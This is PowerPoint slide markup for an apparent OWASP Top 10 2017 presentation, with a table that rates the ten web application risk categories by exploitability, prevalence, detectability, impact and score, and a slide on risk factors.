                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00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68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2901550456"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2209800"/>
          <a:ext cx="6842248" cy="4223373"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1106043">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="414000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="618423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RISK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</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EASY</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0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0"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EASY</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SEVERE</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50" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2:2017-Authentication</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EASY</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0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0"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AVERAGE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SEVERE</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Data Exposure</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AVERAGE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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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bg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AVERAGE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SEVERE</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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entity (XXE)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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AVERAGE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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON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EASY</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SEVERE</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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</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AVERAGE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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON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tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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AVERAGE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SEVERE</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chemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk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34400579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="28798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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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EASY</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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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EASY</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MODERATE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6.0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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7:2017-Cross-Site Scripting (XSS)</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EASY</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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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EASY</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MODERATE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6.0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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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DIFFICULT</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0" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings"/>
                        <a:cs typeface="Liberation Sans"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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON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AVERAGE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SEVERE</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5.0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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Components</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AVERAGE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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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AVERAGE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MODERATE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4.7</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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nsufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" kern="1200">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="1200">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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AVERAGE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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DIFFICULT</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0" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE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en-US" sz="800" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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4.0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1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534266310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="25908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8458">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="22523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aseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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(in alphabetical order) that you should additionally consider include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="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baseline="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Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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2" y="2627763"/>
            <a:ext cx="903369"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Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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627763"/>
            <a:ext cx="956796"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Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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627763"/>
            <a:ext cx="869908"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Technical</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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0" y="2262187"/>
            <a:ext cx="4887049" cy="565291"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="631782"/>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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Weakness</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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans"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333158"/>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cs typeface="Liberation Sans"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627763"/>
            <a:ext cx="718782"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Business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
